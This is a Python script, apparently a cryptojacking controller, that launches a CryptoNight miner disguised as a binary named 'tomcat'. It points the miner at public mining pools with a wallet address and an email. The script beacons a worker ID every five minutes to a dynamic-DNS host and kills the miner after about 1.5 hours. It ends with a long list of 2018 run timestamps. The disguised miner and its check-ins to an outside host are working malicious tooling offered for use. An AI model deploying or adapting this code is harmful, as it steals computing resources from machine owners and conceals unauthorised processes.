import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:04.151191
#2018-02-17 16:47:05.044366
#2018-02-17 18:34:07.662442
#2018-02-17 20:23:04.027820
#2018-02-17 22:10:08.804592
#2018-02-17 23:54:04.124234
#2018-02-18 01:44:04.227530
#2018-02-18 03:32:07.538806
#2018-02-18 05:19:06.453629
#2018-02-18 07:11:05.603673
#2018-02-18 08:59:05.185388
#2018-02-18 10:46:06.955398
#2018-02-18 12:29:05.100561
#2018-02-18 14:17:05.489468
#2018-02-18 16:08:06.342892
#2018-02-18 17:56:03.340356
#2018-02-18 19:42:06.295086
#2018-02-18 21:27:05.592712
#2018-02-18 23:16:05.592387
#2018-02-19 01:02:01.970979
#2018-02-19 02:48:06.817214
#2018-02-19 04:34:06.502564
#2018-02-19 06:20:06.572260
#2018-02-19 08:08:03.872973
#2018-02-19 09:58:01.936613
#2018-02-19 11:48:08.377000
#2018-02-19 13:33:06.620206
#2018-02-19 15:21:06.204359
#2018-02-19 17:09:08.109352
#2018-02-19 18:54:06.558517
#2018-02-19 20:33:05.612260
#2018-02-19 22:19:05.257494
#2018-02-20 00:06:03.828161
#2018-02-20 01:52:07.442895
#2018-02-20 03:40:07.744922
#2018-02-20 05:27:08.806605
#2018-02-20 07:12:02.100692
#2018-02-20 08:58:07.623154
#2018-02-20 10:42:01.592004
#2018-02-20 12:27:09.070331
#2018-02-20 14:15:08.186804
#2018-02-20 15:59:12.781277
#2018-02-20 17:47:01.458990
#2018-02-20 19:36:06.883307
#2018-02-20 21:22:06.792266
#2018-02-20 23:08:04.684003
#2018-02-21 00:52:07.639428
#2018-02-21 02:37:04.946705
#2018-02-21 04:25:01.546375
#2018-02-21 06:13:05.980295
#2018-02-21 07:59:03.989290
#2018-02-21 09:45:08.242436
#2018-02-21 11:35:11.278763
#2018-02-21 13:24:07.655138
#2018-02-21 15:09:04.621144
#2018-02-21 16:58:04.339917
#2018-02-21 18:46:04.896058
#2018-02-21 20:33:02.068565
#2018-02-21 22:20:02.788777
#2018-02-22 00:09:06.641460
#2018-02-22 01:56:01.782791
#2018-02-22 03:43:04.085738
#2018-02-22 05:30:03.644009
#2018-02-22 07:15:01.687237
#2018-02-22 09:01:05.586529
#2018-02-22 10:47:10.178385
#2018-02-22 12:33:08.095660
#2018-02-22 14:19:04.731796
#2018-02-22 16:06:07.320164
#2018-02-22 17:52:08.180991
#2018-02-22 19:38:07.461488
#2018-02-22 21:30:02.364091
#2018-02-22 23:16:07.205374
#2018-02-23 01:02:06.134775
#2018-02-23 02:51:04.947354
#2018-02-23 04:38:06.583810
#2018-02-23 06:24:05.407968
#2018-02-23 08:10:04.274687
#2018-02-23 10:27:05.305061
#2018-02-23 12:20:07.197281
#2018-02-23 14:08:08.580387
#2018-02-23 15:57:06.785168
#2018-02-23 17:41:08.647397
#2018-02-23 19:28:06.793059
#2018-02-23 21:12:08.026430
#2018-02-23 22:59:07.843382
#2018-02-24 00:48:07.627361
#2018-02-24 02:34:01.309660
#2018-02-24 04:27:07.844952
#2018-02-24 06:14:04.174904
#2018-02-24 08:02:07.930148
#2018-02-24 09:44:06.848910
#2018-02-24 11:40:08.898539
#2018-02-24 13:32:02.067140
#2018-02-24 15:19:06.260071
#2018-02-24 17:08:05.081472
#2018-02-24 19:00:01.760021
#2018-02-24 20:47:06.127897
#2018-02-24 23:04:05.175608
#2018-02-25 03:13:03.939773
#2018-02-25 06:45:09.145254